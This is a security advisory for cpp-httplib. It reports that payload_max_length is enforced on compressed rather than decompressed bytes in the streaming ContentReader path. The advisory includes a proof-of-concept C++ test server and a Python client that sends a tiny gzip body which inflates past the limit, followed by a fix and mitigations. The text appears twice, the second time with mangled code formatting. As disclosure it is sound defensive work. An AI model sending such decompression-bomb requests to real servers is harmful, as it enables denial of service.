Summary
cpp-httplib (httplib.h) does not enforce Server::set_payload_max_length() on the decompressed request body when using HandlerWithContentReader (streaming ContentReader) with Content-Encoding: gzip (or other supported encodings). A small compressed payload can expand beyond the configured payload limit and be processed by the application, enabling a payload size limit bypass and potential denial of service (CPU/memory exhaustion).
This behavior is inconsistent with the non-streaming request body path (req.body), which rejects/limits oversized decompressed bodies.
Root Cause
The server request-body parsing path applies payload_max_length_ to the number of bytes read from the network (compressed bytes) inside detail::read_content_* functions. When decompress=true, detail::prepare_content_receiver wraps the receiver with a decompressor, but the size accounting/limit checks still track the compressed input length (e.g., n from the socket read), not the decompressed output length (n2 passed to the receiver after inflate).
Additionally, the decompressed-size protection ("zip bomb" guard) exists only when aggregating into req.body (non-streaming path). When applications use ContentReader (streaming), the receiver is application-provided, and no decompressed-size limit is enforced by the library.
Technical Flow (How the bypass happens)
Server::routing() detects a request with a body and constructs a ContentReader.
- The streaming handler (
HandlerWithContentReader) is matched and invoked via dispatch_request_for_content_reader(...).
- Inside the
ContentReader callback, the library calls:
read_content_with_content_receiver(...) → read_content_core(...)
- which calls
detail::read_content(strm, req, payload_max_length_, status, ..., out, decompress=true)
detail::prepare_content_receiver(...) enables decompression and wraps the receiver:
- read from socket → pass compressed bytes to decompressor
- decompressor emits decompressed chunks to the application receiver
- The payload limit checks in
read_content_with_length/chunked/without-length paths count the compressed bytes read from the socket, so a tiny compressed payload can inflate to a large decompressed stream and still be accepted.
- In contrast, the non-streaming path that builds
req.body includes an explicit decompressed-size guard, so it rejects oversized decompressed bodies.
Impact
An attacker can send Content-Encoding: gzip with a very small compressed Content-Length (e.g., a few hundred bytes) that inflates to a much larger body (hundreds of KB/MB+). When the server endpoint uses HandlerWithContentReader, the application can receive and process decompressed data far beyond payload_max_length, enabling:
- bypass of intended payload size policy,
- increased CPU usage due to decompression work,
- increased memory usage depending on application processing,
- potential Denial of Service (DoS) in constrained environments or high concurrency.
Affected Configurations
- Server-side usage of
HandlerWithContentReader (Server::Post/Put/Patch/Delete overloads with ContentReader)
- Request body decompression enabled via
CPPHTTPLIB_ZLIB_SUPPORT and Content-Encoding: gzip (or another supported encoding)
- Any deployment that relies on
set_payload_max_length() as a security boundary for request body size
Proof of Concept (Reproduction)
Server (C++)
Build requires zlib (-lz) and CPPHTTPLIB_ZLIB_SUPPORT.
server64_strong.cpp
#define CPPHTTPLIB_ZLIB_SUPPORT
#include "httplib.h"
#include <iostream>
#include <cstddef>
static void print_line(const char* tag, bool ok, size_t got, size_t limit) {
std::cout << tag
<< " ok=" << ok
<< " got=" << got
<< " payload_max_length=" << limit
<< std::endl;
}
int main() {
httplib::Server svr;
const size_t LIMIT = 64 * 1024; // 64KB
svr.set_payload_max_length(LIMIT);
// Non-streaming path (req.body). This rejects the same payload (400 in this version).
svr.Post("/body", [LIMIT](const httplib::Request &req, httplib::Response &res) {
print_line("[/body]", true, req.body.size(), LIMIT);
res.status = 200;
res.set_content("body_ok\n", "text/plain");
});
// Streaming path (ContentReader). This accepts and processes decompressed output > LIMIT.
svr.Post("/stream",
[LIMIT](const httplib::Request & /*req*/, httplib::Response &res,
const httplib::ContentReader &content_reader) {
size_t total = 0;
bool ok = content_reader([&](const char* /*data*/, size_t len) {
total += len; // len is decompressed bytes delivered to the callback
return true;
});
print_line("[/stream]", ok, total, LIMIT);
if (total > LIMIT) {
std::cout << "[VULN] Decompressed body exceeded payload_max_length via ContentReader."
<< std::endl;
}
res.status = 200;
res.set_content("stream_ok\n", "text/plain");
});
svr.set_error_handler([](const httplib::Request&, httplib::Response &res) {
std::cout << "[error] status=" << res.status << std::endl;
});
std::cout << "Listening on 127.0.0.1:18080" << std::endl;
bool ok = svr.listen("127.0.0.1", 18080);
std::cerr << "listen ok=" << ok << std::endl;
return ok ? 0 : 1;
}
Build & run:
g++ -O2 -std=c++17 -pthread server64_strong.cpp -lz -o server64_strong
./server64_strong
Client (Python)
poc_gzip_strong.py
import gzip
import socket
HOST, PORT = "127.0.0.1", 18080
raw = b"A" * (256 * 1024) # 256KB decompressed
gz = gzip.compress(raw, compresslevel=9) # ~290 bytes compressed
def send(path: str):
req = (
f"POST {path} HTTP/1.1\r\n".encode() +
b"Host: 127.0.0.1\r\n"
b"Connection: close\r\n"
b"Content-Encoding: gzip\r\n"
b"Content-Length: " + str(len(gz)).encode() + b"\r\n"
b"\r\n" + gz
)
s = socket.create_connection((HOST, PORT))
s.sendall(req)
resp = b""
while True:
chunk = s.recv(4096)
if not chunk:
break
resp += chunk
s.close()
print("==== Response for", path, "====")
print(resp.decode(errors="ignore"))
print("compressed =", len(gz), "bytes")
print("decompressed =", len(raw), "bytes")
send("/body")
send("/stream")
Run:
python3 poc_gzip_strong.py
Observed Results
-
The wire request shows a small compressed payload:
Content-Encoding: gzip
Content-Length: 290
-
/body rejects the request (400 Bad Request in this version/build).
-
/stream returns 200 OK and the server prints:
[/stream] ok=1 got=262144 payload_max_length=65536
[VULN] Decompressed body exceeded payload_max_length via ContentReader.
Expected Results
If set_payload_max_length(64KB) is configured, the server should reject any request whose effective body size after decompression exceeds 64KB, regardless of whether the application uses req.body or ContentReader.
Suggested Fix
Enforce payload_max_length_ on the decompressed output in the ContentReader / content receiver decompression path. Concretely:
- Track total decompressed bytes emitted by the decompressor (e.g.,
decompressed_total).
- If emitting the next chunk would exceed
payload_max_length, abort and return 413 Payload Too Large (or equivalent), and stop further processing.
Mitigations / Workarounds
- Do not enable request-body decompression for endpoints that use
ContentReader (e.g., reject Content-Encoding headers on those endpoints).
- Enforce a decompressed-size limit in the application callback (count bytes and abort once a cap is reached).
- Avoid relying on
payload_max_length as a strict boundary when using ContentReader with decompression.
Summary
cpp-httplib (httplib.h) does not enforce
Server::set_payload_max_length()on the decompressed request body when usingHandlerWithContentReader(streamingContentReader) withContent-Encoding: gzip(or other supported encodings). A small compressed payload can expand beyond the configured payload limit and be processed by the application, enabling a payload size limit bypass and potential denial of service (CPU/memory exhaustion).This behavior is inconsistent with the non-streaming request body path (
req.body), which rejects/limits oversized decompressed bodies.Root Cause
The server request-body parsing path applies
payload_max_length_to the number of bytes read from the network (compressed bytes) insidedetail::read_content_*functions. Whendecompress=true,detail::prepare_content_receiverwraps the receiver with a decompressor, but the size accounting/limit checks still track the compressed input length (e.g.,nfrom the socket read), not the decompressed output length (n2passed to the receiver after inflate).Additionally, the decompressed-size protection ("zip bomb" guard) exists only when aggregating into
req.body(non-streaming path). When applications useContentReader(streaming), the receiver is application-provided, and no decompressed-size limit is enforced by the library.Technical Flow (How the bypass happens)
Server::routing()detects a request with a body and constructs aContentReader.HandlerWithContentReader) is matched and invoked viadispatch_request_for_content_reader(...).ContentReadercallback, the library calls:read_content_with_content_receiver(...)→read_content_core(...)detail::read_content(strm, req, payload_max_length_, status, ..., out, decompress=true)detail::prepare_content_receiver(...)enables decompression and wraps the receiver:read_content_with_length/chunked/without-length paths count the compressed bytes read from the socket, so a tiny compressed payload can inflate to a large decompressed stream and still be accepted.req.bodyincludes an explicit decompressed-size guard, so it rejects oversized decompressed bodies.Impact
An attacker can send
Content-Encoding: gzipwith a very small compressedContent-Length(e.g., a few hundred bytes) that inflates to a much larger body (hundreds of KB/MB+). When the server endpoint usesHandlerWithContentReader, the application can receive and process decompressed data far beyondpayload_max_length, enabling:Affected Configurations
HandlerWithContentReader(Server::Post/Put/Patch/Deleteoverloads withContentReader)CPPHTTPLIB_ZLIB_SUPPORTandContent-Encoding: gzip(or another supported encoding)set_payload_max_length()as a security boundary for request body sizeProof of Concept (Reproduction)
Server (C++)
Build requires zlib (
-lz) andCPPHTTPLIB_ZLIB_SUPPORT.server64_strong.cpp
Build & run:
Client (Python)
poc_gzip_strong.py
Run:
Observed Results
The wire request shows a small compressed payload:
Content-Encoding: gzipContent-Length: 290/bodyrejects the request (400 Bad Request in this version/build)./streamreturns200 OKand the server prints:[/stream] ok=1 got=262144 payload_max_length=65536[VULN] Decompressed body exceeded payload_max_length via ContentReader.Expected Results
If
set_payload_max_length(64KB)is configured, the server should reject any request whose effective body size after decompression exceeds 64KB, regardless of whether the application usesreq.bodyorContentReader.Suggested Fix
Enforce
payload_max_length_on the decompressed output in theContentReader/ content receiver decompression path. Concretely:decompressed_total).payload_max_length, abort and return413 Payload Too Large(or equivalent), and stop further processing.Mitigations / Workarounds
ContentReader(e.g., rejectContent-Encodingheaders on those endpoints).payload_max_lengthas a strict boundary when usingContentReaderwith decompression.